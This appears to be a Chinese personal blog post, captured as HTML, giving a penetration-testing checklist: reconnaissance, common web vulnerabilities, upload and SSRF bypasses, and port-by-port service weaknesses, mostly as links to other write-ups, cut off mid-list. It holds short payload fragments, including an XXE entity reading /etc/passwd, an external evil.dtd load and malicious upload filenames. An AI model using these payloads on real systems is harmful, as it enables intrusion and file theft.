<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="渗透测试"><meta name="keywords" content="web,CTF,tools"><meta name="author" content="xxynly"><meta name="copyright" content="xxynly"><title>渗透测试 | 小夏要努力呀</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="小夏要努力呀" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95"><span class="toc-number">1.</span> <span class="toc-text">渗透测试</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%9A%E5%8A%A1%E7%9B%B8%E5%85%B3"><span class="toc-number">1.1.1.</span> <span class="toc-text">业务相关</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%9F%E5%90%8D%E7%9B%B8%E5%85%B3"><span class="toc-number">1.1.2.</span> <span class="toc-text">域名相关</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%BB%E6%9C%BA"><span class="toc-number">1.1.3.</span> <span class="toc-text">服务器主机</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%B1%E7%82%B9%E6%A3%80%E6%B5%8B"><span class="toc-number">1.2.</span> <span class="toc-text">弱点检测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.2.1.</span> <span class="toc-text">常见漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E6%9C%8D%E5%8A%A1%E5%BC%B1%E7%82%B9"><span class="toc-number">1.2.2.</span> <span class="toc-text">常见服务弱点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.2.3.</span> <span class="toc-text">通用漏洞</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass"><span class="toc-number">1.3.</span> <span class="toc-text">Bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Upload"><span class="toc-number">1.3.1.</span> <span class="toc-text">Upload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XSS"><span class="toc-number">1.3.2.</span> <span class="toc-text">XSS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL-%E6%B3%A8%E5%85%A5"><span class="toc-number">1.3.3.</span> <span class="toc-text">SQL 注入</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.4.</span> <span class="toc-text">代码审计</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP"><span class="toc-number">1.4.1.</span> <span class="toc-text">PHP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Java"><span class="toc-number">1.4.2.</span> <span class="toc-text">Java</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E6%B8%97%E9%80%8F%E4%B8%8E%E6%8C%81%E7%BB%AD%E6%B8%97%E9%80%8F"><span class="toc-number">1.5.</span> <span class="toc-text">后渗透与持续渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E4%B8%8E%E6%8F%90%E5%8D%87"><span class="toc-number">1.5.1.</span> <span class="toc-text">权限维持与提升</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.5.2.</span> <span class="toc-text">内网渗透</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8C%81%E7%BB%AD%E6%B8%97%E9%80%8F%E5%92%8C%E4%B8%80%E4%BA%9B%E6%8A%80%E5%B7%A7"><span class="toc-number">1.5.3.</span> <span class="toc-text">持续渗透和一些技巧</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#APT%E6%94%BB%E5%87%BB"><span class="toc-number">1.5.4.</span> <span class="toc-text">APT攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B5%81%E9%87%8F%E5%8F%96%E8%AF%81"><span class="toc-number">1.5.5.</span> <span class="toc-text">流量取证</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A4%BE%E4%BC%9A%E5%B7%A5%E7%A8%8B%E5%AD%A6%E6%8A%80%E5%B7%A7"><span class="toc-number">1.5.6.</span> <span class="toc-text">社会工程学技巧</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7"><span class="toc-number">1.6.</span> <span class="toc-text">工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%AB%E6%8F%8F%E5%B7%A5%E5%85%B7"><span class="toc-number">1.6.1.</span> <span class="toc-text">扫描工具</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E6%A1%86%E6%9E%B6"><span class="toc-number">1.6.2.</span> <span class="toc-text">渗透框架</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-1"><span class="toc-number">1.6.3.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2"><span class="toc-number">1.6.4.</span> <span class="toc-text">信息泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E8%BE%85%E5%8A%A9"><span class="toc-number">1.6.5.</span> <span class="toc-text">渗透辅助</span></a></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://i.loli.net/2020/11/15/FaeblZuW5LGvnfd.jpg"></div><div class="author-info__name text-center">xxynly</div><div class="author-info__description text-center">保持热爱，奔赴山海</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">3</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">6</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">2</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">小夏要努力呀</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">归档</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/gallery">相册</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">渗透测试</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-12-23</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E6%B8%97%E9%80%8F/">渗透</a><span class="post-meta__separator">|</span><i class="fa fa-comment-o post-meta__icon" aria-hidden="true"></i><a href="/2020/12/23/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/#disqus_thread"><span class="disqus-comment-count" data-disqus-identifier="2020/12/23/渗透测试/"></span></a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1k</span><span class="post-meta__separator">|</span><span>阅读时长: 4 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="业务相关"><a href="#业务相关" class="headerlink" title="业务相关"></a>业务相关</h3><ul>
<li><p>github泄漏</p>
</li>
<li><p>网盘泄漏</p>
</li>
<li><p>敏感路径扫描</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/ring04h/dirfuzz">https://github.com/ring04h/dirfuzz</a></li>
</ul>
</li>
<li><p>QQ群文件泄漏</p>
</li>
</ul>
<h3 id="域名相关"><a href="#域名相关" class="headerlink" title="域名相关"></a>域名相关</h3><ul>
<li><p>域名商</p>
<ul>
<li>找域名商漏洞，越权影响目标域名</li>
<li>欺骗域名商客服，影响目标域名</li>
<li>社工账号，篡改解析地址</li>
</ul>
</li>
<li><p>DNS</p>
<ul>
<li>渗透DNS服务器，和社工DNS服务商</li>
<li>DNS域传送漏洞</li>
<li>子域名接管漏洞</li>
</ul>
</li>
<li><p>CDN</p>
<ul>
<li><p>找真实IP地址</p>
<ul>
<li><p>censys.io 等网络空间引擎查找关键字</p>
</li>
<li><p>SSRF漏洞</p>
</li>
<li><p>查找域名历史解析IP</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://securitytrails.com/">https://securitytrails.com/</a></li>
<li>site.ip138.com</li>
</ul>
</li>
<li><p>服务器信息泄露</p>
</li>
<li><p>探测子域名IP</p>
</li>
<li><p>cloudflare(HatCloud)</p>
</li>
<li><p>看邮件发送者源IP</p>
</li>
<li><p>APP客户端</p>
</li>
<li><p>DOS CDN可能会成回源模式</p>
</li>
</ul>
</li>
<li><p>破解CDN服务账号</p>
</li>
</ul>
</li>
<li><p>WHOIS</p>
<ul>
<li><p>注册者邮箱</p>
<ul>
<li>反查其他域名</li>
</ul>
</li>
<li><p>手机号</p>
</li>
<li><p>地址</p>
</li>
<li><p>注册者名称</p>
</li>
<li><p>DNS</p>
</li>
</ul>
</li>
<li><p>子域名</p>
<ul>
<li><p>搜索引擎</p>
<ul>
<li>fofa、傻蛋、谛听、zoomeye、censys</li>
<li>Google、bing、baidu、duckduckgo</li>
<li>接口聚合：<a target="_blank" rel="noopener" href="https://github.com/bit4woo/teemo">https://github.com/bit4woo/teemo</a></li>
</ul>
</li>
<li><p>暴力破解</p>
<ul>
<li>layer</li>
<li>wydomain </li>
</ul>
</li>
<li><p>网页爬虫</p>
<ul>
<li>基于JS的域名探测<a target="_blank" rel="noopener" href="https://github.com/nsonaniya2010/SubDomainizer">https://github.com/nsonaniya2010/SubDomainizer</a></li>
</ul>
</li>
<li><p>DNS查找</p>
<ul>
<li>dnsdumpster.com</li>
<li><a target="_blank" rel="noopener" href="http://www.virustotal.com/">www.virustotal.com</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="服务器主机"><a href="#服务器主机" class="headerlink" title="服务器主机"></a>服务器主机</h3><ul>
<li><p>端口</p>
<ul>
<li>nmap</li>
<li>Zenmap</li>
</ul>
</li>
<li><p>系统识别</p>
<ul>
<li>nmap -O</li>
<li>大小写敏感</li>
<li>TTL</li>
<li>banner</li>
<li>信息泄露</li>
<li>特殊端口 如（22 / 139 / 445 / 1433 / 3389）</li>
<li>HOSTNAME</li>
</ul>
</li>
<li><p>相关资产</p>
<ul>
<li><p>同服网站</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://dns.aizhan.com/">https://dns.aizhan.com</a></li>
</ul>
</li>
<li><p>备案反查</p>
</li>
</ul>
</li>
<li><p>C段业务</p>
<ul>
<li>可能会有其他相关业务，如交换机、机房后台、监控系统等</li>
</ul>
</li>
<li><p>指纹识别</p>
<ul>
<li>特有文件MD5</li>
<li>包含字符</li>
<li>cookie</li>
<li>响应头</li>
</ul>
</li>
</ul>
<h2 id="弱点检测"><a href="#弱点检测" class="headerlink" title="弱点检测"></a>弱点检测</h2><h3 id="常见漏洞"><a href="#常见漏洞" class="headerlink" title="常见漏洞"></a>常见漏洞</h3><ul>
<li><p>文件操作</p>
<ul>
<li><p>文件上传</p>
<ul>
<li><p>字典生成 <a target="_blank" rel="noopener" href="https://github.com/c0ny1/upload-fuzz-dic-builder">https://github.com/c0ny1/upload-fuzz-dic-builder</a></p>
</li>
<li><p>%00截断</p>
</li>
<li><p>畸形文件名</p>
<ul>
<li><p>Windows<br>将？删除</p>
<ul>
<li><p>shell.?php{?%80-%?99}</p>
</li>
<li><p>NTFS ADS特性</p>
<ul>
<li>shell.?php……</li>
<li>shell.?php::$DATA</li>
<li>shell.?php:a.jpg</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>目录穿越</p>
</li>
<li><p>文件头绕过</p>
</li>
<li><p>修改上传类型 Content-Type</p>
</li>
<li><p>双文件上传</p>
</li>
<li><p>超长截断</p>
<ul>
<li>长文件名 </li>
<li>长Content-Disposition</li>
</ul>
</li>
<li><p>特殊文件</p>
<ul>
<li>上传html、htm 可以 XSS</li>
<li>swf 可以XSS</li>
<li>pdf 在 chrome 里可以做跳转</li>
<li>cer、asa、jspx、php5、phtml等可能会被当做动态语言解析</li>
<li>.htaccess .user.ini  web.config web.xml  等</li>
</ul>
</li>
<li><p>无大小和次数限制</p>
<ul>
<li>无限上传制造垃圾数据堵死硬盘</li>
</ul>
</li>
<li><p>imagemagick命令执行</p>
</li>
</ul>
</li>
<li><p>文件读取</p>
<ul>
<li>读取系统敏感文件 如配置文件</li>
</ul>
</li>
<li><p>文件包含</p>
<ul>
<li>可读取文件或代码执行</li>
</ul>
</li>
<li><p>文件删除</p>
<ul>
<li>删除配置文件可破坏网站</li>
<li>删除安装锁可重装</li>
</ul>
</li>
</ul>
</li>
<li><p>CSRF</p>
<ul>
<li><p>自动检测 <a target="_blank" rel="noopener" href="https://github.com/BlackHole1/autoFindXssAndCsrf">https://github.com/BlackHole1/autoFindXssAndCsrf</a></p>
</li>
<li><p>FLASH CSRF</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://blog.knownsec.com/2013/03/%E7%A7%91%E6%99%AE%E4%BD%8E%E8%B0%83%E7%9A%84flash-csrf%E6%94%BB%E5%87%BB/">http://blog.knownsec.com/2013/03/%E7%A7%91%E6%99%AE%E4%BD%8E%E8%B0%83%E7%9A%84flash-csrf%E6%94%BB%E5%87%BB/</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/fdsajhg30000/archive/2011/02/14/1953966.html">https://www.cnblogs.com/fdsajhg30000/archive/2011/02/14/1953966.html</a></li>
<li><a target="_blank" rel="noopener" href="http://www.vuln.cn/7134">http://www.vuln.cn/7134</a></li>
</ul>
</li>
</ul>
</li>
<li><p>XSS</p>
<ul>
<li><p>普通反射/持久/DOM型</p>
</li>
<li><p>UXSS</p>
</li>
<li><p>XSS 蠕虫</p>
</li>
<li><p>rootkit xss</p>
</li>
<li><p>Flash Xss</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/44299.html">https://www.secpulse.com/archives/44299.html</a></li>
</ul>
</li>
<li><p>其他文档</p>
<ul>
<li><p>Web前后端漏洞分析与防御 <a target="_blank" rel="noopener" href="https://github.com/TYRMars/WebSafe-StepPitGuide">https://github.com/TYRMars/WebSafe-StepPitGuide</a></p>
</li>
<li><p>脑图</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/phith0n/Mind-Map/blob/master/xss%20virus%201.0.png">https://github.com/phith0n/Mind-Map/blob/master/xss%20virus%201.0.png</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/phith0n/Mind-Map/blob/master/XSS2.png">https://github.com/phith0n/Mind-Map/blob/master/XSS2.png</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/phith0n/Mind-Map/blob/master/XSS%E8%84%91%E5%9B%BE.png">https://github.com/phith0n/Mind-Map/blob/master/XSS%E8%84%91%E5%9B%BE.png</a></li>
</ul>
</li>
</ul>
</li>
<li><p>CRLF注入在响应头会导致XSS</p>
</li>
</ul>
</li>
<li><p>SQL注入</p>
<ul>
<li><p>ORACLE</p>
<ul>
<li>执行java代码</li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/rebeyond/p/7928887.html">https://www.cnblogs.com/rebeyond/p/7928887.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/pshell/articles/7473713.html">https://www.cnblogs.com/pshell/articles/7473713.html</a></li>
</ul>
</li>
<li><p>MYSQL</p>
<ul>
<li>load_file()  文件读取函数</li>
<li>outfile 写文件</li>
<li>MOF / UDF 提权</li>
<li>general_log_file 写文件</li>
</ul>
</li>
<li><p>SQL Server</p>
<ul>
<li><p>xp_cmdsell</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/027636ef4640">https://www.jianshu.com/p/027636ef4640</a></li>
</ul>
</li>
<li><p>wscript.shell</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xred/archive/2011/12/31/2308724.html">https://www.cnblogs.com/xred/archive/2011/12/31/2308724.html</a></li>
</ul>
</li>
<li><p>沙盒模式</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/sircoding/article/details/78683192">https://blog.csdn.net/sircoding/article/details/78683192</a></li>
</ul>
</li>
<li><p>存储过程写文件 </p>
</li>
<li><p>xp_dirtree</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/kj021320/article/details/1736964">https://blog.csdn.net/kj021320/article/details/1736964</a></li>
</ul>
</li>
<li><p>sp_oamethod</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.0dayhack.com/post-678.html">https://www.0dayhack.com/post-678.html</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>代码执行/命令执行</p>
<ul>
<li><p>命令执行</p>
<ul>
<li>&amp;  / &amp;&amp; / | / || / ; </li>
<li>系统变量 ${xx}  and %xx%</li>
</ul>
</li>
<li><p>代码执行</p>
<ul>
<li><p>表达式</p>
<ul>
<li>freemarker</li>
<li>OGNL</li>
<li>Spel</li>
<li>jsel</li>
</ul>
</li>
<li><p>非表达式</p>
<ul>
<li><p>php</p>
<ul>
<li>eval</li>
<li>assert</li>
<li>call_user_func() / call_user_func_array()</li>
<li>preg_replace()</li>
<li>create_function()</li>
<li>array_map()</li>
<li>array_filter()</li>
<li>usort() / uasort()</li>
<li>反序列化</li>
<li>php 源文件拼接写入</li>
</ul>
</li>
<li><p>java</p>
<ul>
<li>反序列化</li>
<li>远程 jar 加载</li>
<li>反射机制</li>
<li>jsp 源文件拼接写入</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>SSRF</p>
<ul>
<li><p>利用姿势</p>
<ul>
<li><p>http/s协议</p>
<ul>
<li>获取真实IP</li>
<li>内网主机 / 端口探测</li>
<li>攻击redis、memcache等</li>
</ul>
</li>
<li><p>file协议</p>
<ul>
<li>读取文件</li>
</ul>
</li>
<li><p>gopher协议</p>
<ul>
<li>同上</li>
</ul>
</li>
</ul>
</li>
<li><p>绕过</p>
<ul>
<li>IP换成域名</li>
<li>IP换成10进制</li>
<li><a target="_blank" rel="noopener" href="http://xxx.com@baidu.com/">http://xxx.com@baidu.com</a></li>
<li>302 跳转</li>
</ul>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.t00ls.net/articles-41070.html">https://www.t00ls.net/articles-41070.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>XXE</p>
<ul>
<li><p>利用姿势</p>
<ul>
<li><p>文件读取</p>
<ul>
<li><!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]&gt;</li>
</ul>
</li>
<li><p>SSRF</p>
<ul>
<li><!DOCTYPE test SYSTEM 'http://www.test.com/evil.dtd'>
</li>
</ul>
</li>
</ul>
</li>
<li><p>参考</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/177979.html">https://www.freebuf.com/articles/web/177979.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>无恶意特征的漏洞</p>
<ul>
<li><p>整数溢出</p>
<ul>
<li>数字超出限定大小则会为负数。如：在购买商品时填写超长数字，造成溢出，最终乘以金额变为负数</li>
</ul>
</li>
<li><p>并发修改数据（如提现）</p>
</li>
<li><p>网站重装</p>
</li>
<li><p>未授权访问</p>
</li>
<li><p>水平与垂直越权</p>
</li>
<li><p>JSONP劫持</p>
</li>
<li><p>密码重置</p>
</li>
<li><p>点击劫持</p>
</li>
</ul>
</li>
<li><p>编辑器漏洞</p>
<ul>
<li><p>fckeditor</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bl8ck/p/9521448.html">https://www.cnblogs.com/bl8ck/p/9521448.html</a></li>
</ul>
</li>
<li><p>ueditor</p>
<ul>
<li><p>.net</p>
<ul>
<li><p>getshell</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/vuldb/ssvid-97499">https://www.seebug.org/vuldb/ssvid-97499</a></li>
</ul>
</li>
</ul>
</li>
<li><p>jsp</p>
<ul>
<li><p>文件上传</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/11232.html">https://www.secpulse.com/archives/11232.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>ssrf</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://paper.seebug.org/606/">https://paper.seebug.org/606/</a></li>
</ul>
</li>
</ul>
</li>
<li><p>ckfinder</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/appdir/CKFinder">https://www.seebug.org/appdir/CKFinder</a></li>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/26999.html">https://www.secpulse.com/archives/26999.html</a></li>
</ul>
</li>
<li><p>CKEditor</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.seebug.org/vuldb/ssvid-60642">https://www.seebug.org/vuldb/ssvid-60642</a></li>
</ul>
</li>
<li><p>KindEditor </p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/171422">https://www.anquanke.com/post/id/171422</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/128076.html">https://www.freebuf.com/articles/web/128076.html</a></li>
</ul>
</li>
<li><p>ewebeditor</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/milantgh/p/3601739.html">https://www.cnblogs.com/milantgh/p/3601739.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.0dayhack.com/post-426.html">https://www.0dayhack.com/post-426.html</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="常见服务弱点"><a href="#常见服务弱点" class="headerlink" title="常见服务弱点"></a>常见服务弱点</h3><ul>
<li><p>21 / FTP </p>
<ul>
<li>匿名/暴力破解</li>
<li>拒绝服务</li>
</ul>
</li>
<li><p>22 / SSH</p>
<ul>
<li>暴力破解</li>
</ul>
</li>
<li><p>23 / telnet</p>
<ul>
<li><p>Winbox(CVE-2018-14847)</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/BasuCert/WinboxPoC">https://github.com/BasuCert/WinboxPoC</a></li>
</ul>
</li>
<li><p>弱口令 / 暴力破解</p>
</li>
</ul>
</li>
<li><p>161 / snmp</p>
<ul>
<li><p>弱口令</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/archersaber39/article/details/78932252">https://blog.csdn.net/archersaber39/article/details/78932252</a></li>
</ul>
</li>
</ul>
</li>
<li><p>389 / ladp</p>
<ul>
<li><p>匿名访问</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/persuit/p/5706432.html">https://www.cnblogs.com/persuit/p/5706432.html</a></li>
</ul>
</li>
<li><p>ladp注入</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.4hou.com/technology/9090.html">http://www.4hou.com/technology/9090.html</a></li>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/149059.html">https://www.freebuf.com/articles/web/149059.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>443 / ssl</p>
<ul>
<li><p>openssl心脏出血</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://paper.seebug.org/437/">https://paper.seebug.org/437/</a><br><a target="_blank" rel="noopener" href="http://www.anquan.us/static/drops/papers-1381.html">http://www.anquan.us/static/drops/papers-1381.html</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/33191.html">https://www.freebuf.com/sectool/33191.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>445 / smb</p>
<ul>
<li>win10拒绝服务</li>
<li>永恒之蓝RCE</li>
</ul>
</li>
<li><p>875 / rsync</p>
<ul>
<li><p>匿名访问</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.anquan.us/static/bugs/wooyun-2016-0190815.html">http://www.anquan.us/static/bugs/wooyun-2016-0190815.html</a><br><a target="_blank" rel="noopener" href="https://paper.seebug.org/409/">https://paper.seebug.org/409/</a><br><a target="_blank" rel="noopener" href="http://www.91ri.org/11093.html">http://www.91ri.org/11093.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>1433 / mssql</p>
<ul>
<li><p>暴力破解</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.anquan.us/static/drops/tips-12749.html">http://www.anquan.us/static/drops/tips-12749.html</a><br><a target="_blank" rel="noopener" href="https://www.seebug.org/appdir/Microsoft%20SQL%20Server">https://www.seebug.org/appdir/Microsoft%20SQL%20Server</a></li>
</ul>
</li>
</ul>
</li>
<li><p>1521 / oracle</p>
<ul>
<li><p>暴力破解</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/33084">https://www.exploit-db.com/exploits/33084</a></li>
</ul>
</li>
</ul>
</li>
<li><p>2601 / zebra</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.anquan.us/static/bugs/wooyun-2013-047409.html">http://www.anquan.us/static/bugs/wooyun-2013-047409.html</a></li>
</ul>
</li>
<li><p>3128 / squid</p>
</li>
<li><p>3306 / mysql</p>
<ul>
<li><p>RCE</p>
<ul>
<li><p><a target="_blank" rel="noopener" href="http://www.91ri.org/17511.html">http://www.91ri.org/17511.html</a></p>
<ul>
<li>CVE-2015-0411</li>
</ul>
</li>
</ul>
</li>
<li><p>hash破解</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/153561.html">https://www.freebuf.com/column/153561.html</a></li>
</ul>
</li>
<li><p>waf绕过</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/155570.html">https://www.freebuf.com/articles/web/155570.html</a></li>
</ul>
</li>
<li><p>general_log_file getshell</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/143125.html">https://www.freebuf.com/column/143125.html</a></li>
</ul>
</li>
<li><p>提权</p>
<ul>
<li><a target="_blank" rel="noopener" href="http://www.91ri.org/16540.html">http://www.91ri.org/16540.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>3312 / kangle</p>
<ul>
<li><p>getshell</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/23927.html">https://www.secpulse.com/archives/23927.html</a></li>
</ul>
</li>
</ul>
</li>
<li><p>3389 / rdp</p>
<ul>
<li><p>shift 放大镜 输入法绕过 guest用户</p>
</li>
<li><p>永恒之蓝(ESTEEMAUDIT)</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/132171.html">https://www.freebuf.com/articles/system/132171.html</a><br><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/86328">https://www.anquanke.com/post/id/86328</a></li>
</ul>
</li>
<li><p>ms12-020</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/meyo_leo/article/details/77950552">https://blog.csdn.net/meyo_leo/article/details/77950552</a></li>
</ul>
</li>
</ul>
</li>
<li><p>4440 / rundeck </p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/29500.html">https://www.secpulse.com/archives/29500.html</a></li>
</ul>
</li>
<li><p>4848 / glassfish</p>
<ul>
<li><p>文件读取</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/42277.html">https://www.secpulse.com/archives/42277.html</a></li>
